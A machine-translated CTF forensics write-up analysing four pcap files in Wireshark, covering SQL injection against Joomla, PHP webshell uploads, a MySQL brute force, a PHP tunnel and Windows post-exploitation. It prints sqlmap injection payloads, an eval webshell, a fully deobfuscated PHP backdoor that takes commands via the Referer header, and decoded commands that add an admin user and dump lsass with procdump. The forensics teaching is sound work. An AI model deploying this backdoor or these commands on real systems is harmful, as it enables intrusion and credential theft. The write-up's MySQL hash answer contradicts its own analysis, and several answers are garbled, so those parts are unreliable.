Table of contents
foreword
Wireshark traffic packet analysis is very important for security. We can use Wireshark to diagnose network problems, detect network attacks, monitor network traffic, and capture malware, etc.
Next, let's look at a data analysis question, which requires 4 traffic packets 1-4.pcap, and the network disk link is extracted by itself
Link: https://pan.baidu.com/s/1gTL_l0Xk2xP3ZNWYvBWi8g?pwd=d6g7
Extraction code: d6g7
1. Topic 1 (1.pcap)
Topic requirements:
1. The network card IP address of the first victim host attacked by hackers
2. The hacker implemented SQL injection on which parameter of the URL
3. The table prefix of the first victim host website database (add underscores such as abc)
4. The name of the first victim host website database
See the topic SQL injection, then first filter the http and https protocols
After filtering, you can see two ips with more occurrences, 202.1.1.2 and 192.168.1.8, and you can see that 202.1.1.2 has attacked 192.168.1.8
The answer to the first question here comes out, the IP of the network card of the victim host is 192.168.1.8 , and 202.1.1.2 is the IP of the attacker
Then directly look at the http request packet with source IP 202.1.1.2
Let’s just look at a package here, and the urlcode is decoded as follows
It can be seen that hackers used SQL injection to try to construct stored xss
option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(&XfqR=2916 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',tab
Look at another package, the same urlcode decoding
After analysis, it is found that SQL injection is still being attempted, the injection tool sqlmap, and the injection point is list[select]
option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(" OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71717a7671,(SELECT (ELT(883
Then we trace a SQL injection TCP stream
You can see that the database is MariaDB, an error has been reported, and the table prefix is ajtuc_
If we want to find the database name, we'd better go to the last few items to find it. If the schema keyword is included in the url, the probability is the database name.
The database name here uses hexadecimal decoding, which is joomla
Answer:
1. The network card IP address of the first victim host attacked by the hacker
is 192.168.1.8
2. Which parameter of the URL the hacker implemented SQL injection
list[select]
3. The table prefix of the first victim host website database (underline For example abc_)
ajtuc_
4. The name of the first victim host website database
joomla
2. Topic 2 (2.pcap)
Open 2.pcap
Topic requirements:
1. What is the password of the PHP Trojan horse obtained by hackers for the first time?
2. When did the hacker upload the PHP Trojan for the second time?
3. Which header in the HTTP protocol does the second uploaded Trojan transmit data through?
The topic requires the password of the php Trojan horse. First of all, we need to know that the php one-word Trojan horse is usually a POST request.
So we directly filtered the POST request and found that this IP requested a php file named kkkaaa.php, which was very suspicious
Normal files will not be named after this. Open the data packet and take a look, and found this field
Form item: "zzz" = "@eval(base64_decode($_POST[z0]));"
In fact, one sentence Trojan horse password has come out, it is zzz
Here he uploaded a word Trojan horse should be
<?php eval($_POST['zzz']);?>
Then eval(base64_decode($_POST[z0])); is passed into the zzz parameter, the purpose is to decode the data passed in by z0 to base64
At this time, z0 passes in the base64-encoded data to execute malicious code.
After decoding, it is found that the dirname function is executed, the purpose is to view the files or directories under the current path, similar to the ls command under linux
The second question is the time when the Trojan was uploaded for the second time
If you have no clue, analyze the filtered packets. The other parameters are the same. The important thing is the Length field.
The first packet will undoubtedly be a little longer than the other packets, but the fourth packet is very strange, about 150 bytes longer than the other packets
trace tcp flow
It can be clearly seen that z2 is very abnormal, and other parameters are urlcode and base64 encoding
z2 uses hexadecimal encoding, let's decode it
Such PHP code is obfuscated, so that we can't understand his code at all
The restored code:
<?php
$kh = "cb42";
$kf = "e130";
function x($t, $k)
{
$c = strlen($k);
$l = strlen($t);
$o = "";
for ($i = 0; $i < $l;) {
for ($j = 0; ($j < $c && $i < $l); $j++, $i++) {
$o .= $t{$i} ^ $k{$j};
}
}
return $o;
}
$r = $_SERVER;
$rr = @$r["HTTP_REFERER"];
$ra = @$r["HTTP_ACCEPT_LANGUAGE"];
if ($rr && $ra) {
$u = parse_url($rr);
parse_str($u["query"], $q);
$q = array_values($q);
preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/", $ra, $m);
if ($q && $m) {
@session_start();
$s =& $_SESSION;
$ss = "substr";
$sl = "strtolower";
$i = $m[1][0] . $m[1][4];
$h = $sl($ss(md5($i . $kh), 0, 3));
$f = $sl($ss(md5($i . $kf), 0, 3));
$p = "";
for ($z = 1; $z < count($m[1]); $z++) $p .= $q[$m[2][$z]];
if (strpos($p, $h) === 0) {
$s[$i] = "";
$p = $ss($p, 3);
}
if (array_key_exists($i, $s)) {
$s[$i] .= $p;
$e = strpos($s[$i], $f);
if ($e) {
$k = $kh . $kf;
ob_start();
@eval(@gzuncompress(@x(@base64_decode(preg_replace(array("/_/", "/-/"), array("/", "+"), $ss($s[$i], 0, $e))), $k)));
$o = ob_get_contents();
ob_end_clean();
$d = base64_encode(x(gzcompress($o), $k));
print("<$k>$d</$k>");
@session_destroy();
}
}
}
}
?>
After checking, I found the create_function function, which can execute commands
The official also hinted that this function has been removed in 8.0, and has the same security risks as the eval() function
It shows that the hacker used the create_function function to upload his own Trojan horse
For time, ctrl+f, select the group details, select the string, search for the time string, and the time will come out
Feb 7, 2018 17:20:44.248365000 China Standard Time
Then let's analyze this Trojan
If the Trojan horse wants to use it, it will inevitably interact with the data packet. Take a closer look at these two lines of code
$rr = @$r["HTTP_REFERER"];
$ra = @$r["HTTP_ACCEPT_LANGUAGE"];
These two lines of code are to obtain the referer and accept_language fields in the http request, and interact with the data packet
So it can be basically concluded that these two fields are used by hackers to transmit the commands he wants to execute
Let's just look at a package that accesses footer.php
It is found that the length of the Referer field is very abnormal, and the Accept-Language field is normal
So it can be basically determined that the Trojan transmits data through the referer header in the HTTP protocol
Answer
1. What is the password of the php Trojan horse obtained by the hacker for the first time
? 2. When is the hacker
uploading the php Trojan horse for the second time?
3. Topic 3 (3.pcap)
Open 3.pcap
Topic requirements:
1. What is the mysql user name of the intranet host and the password hash of the requested connection (user: password hash)
2. Which IP address was first connected to when the php proxy was used for the first time
The topic requires mysql data, filter directly, tcp contains "mysql" && mysql
Hackers Have Been Blowing MySQL Passwords, Discovered
We found the last one, which may be the successful password
User: admin
Password Hash: 4858e7dcb0968daa7b599be4b0edb88a25ad89ac
Then filter the http request and find a php file named tunnel.php
Click to open and you can clearly see that the IP address of the first connection of the php proxy is 4.2.2.2 , port 53
Answer
1. What is the mysql user name of the intranet host and the password hash of the requested connection (user: password hash)
admin: 1a3068c3e29e03e3bcfdba6f8669ad23349dc6c4
2. Which IP address is first connected to when the php proxy is used for the first time
4.2.2.2
4. Topic 4 (4.pcap)
Open 4.pcap
Topic requirements:
1. When did the hacker first request to exploit the vulnerability to obtain the file list in the current directory?
2. What is the username and password added by the hacker to the internal host?
3. The name of the file downloaded by the hacker from the intranet server
The command to get the file list of the current directory, dir in Windows, ls in Linux
filter directly
(ip.addr == 192.168.1.8 || ip.addr == 202.1.1.2) && (http contains "dir" || http contains "ls")
It is found that there are ls and dir
Tracing the tcp flow, I found that the first ls was not executed successfully because there was no server echo
The second dir execution was successful
search time
Feb 7, 2018 18:36:59.770782000 China Standard Time
Adding users under Windows must use net user, and the administrator user echoes Administrator, so we directly filter
(ip.addr == 192.168.1.8 || ip.addr == 202.1.1.2) && (http contains "user" || http contains "Administrator")
It can be seen here that there is no user, time Feb 7, 2018 18:49:27.767754000 China Standard Time
Looking back, I found that the administrator user kaka has been added, time
Feb 7, 2018 18:50:42.908737000 China Standard Time
Then the hacker must have executed the command to add users during this time period
Then let's look at the http requests during this period and filter them directly by time
(ip.addr == 192.168.1.8 || ip.addr == 202.1.1.2) && http && frame.time_relative >= 827.109385 && frame.time_relative <= 902.267039
Eventually we found this unusual request
Discovered by base64 decoding
cd/d"C:\phpStudy\WWW\b2evolution\install\test\"&net user kaka kaka /add&echo [S]&cd&echo [E]
Username and password are kaka:kaka
The last question is downloading. In one sentence, the Trojan horse is a POST request, and the IP address of the attack is 192.168.2.20, then filter it directly
ip.dst == 192.168.2.20 && http.request.method == POST
After sifting out, there is no way to only see one by one, base64 decoding
Then found this package at the end
After decoding:
cd/d"C:\phpStudy\WWW\b2evolution\install\test\"&procdump.exe -accepteula -ma lspasss.dmp&echo [S]&cd&echo [E]
Found that procdump.exe was used
Looking back, I found this package
It is decoded like this
C:\phpStudy\WWW\b2evolution\install\test\lsass.exe_180208_185247.dmp
Finally we can confirm that the hacker downloaded lsass.exe_180208_185247.dmp
the file
Answer
1. When did the hacker first obtain the file list under the current directory to exploit the
vulnerability
? .The file name lsass.exe_180208_185247.dmp
downloaded by the hacker from the intranet server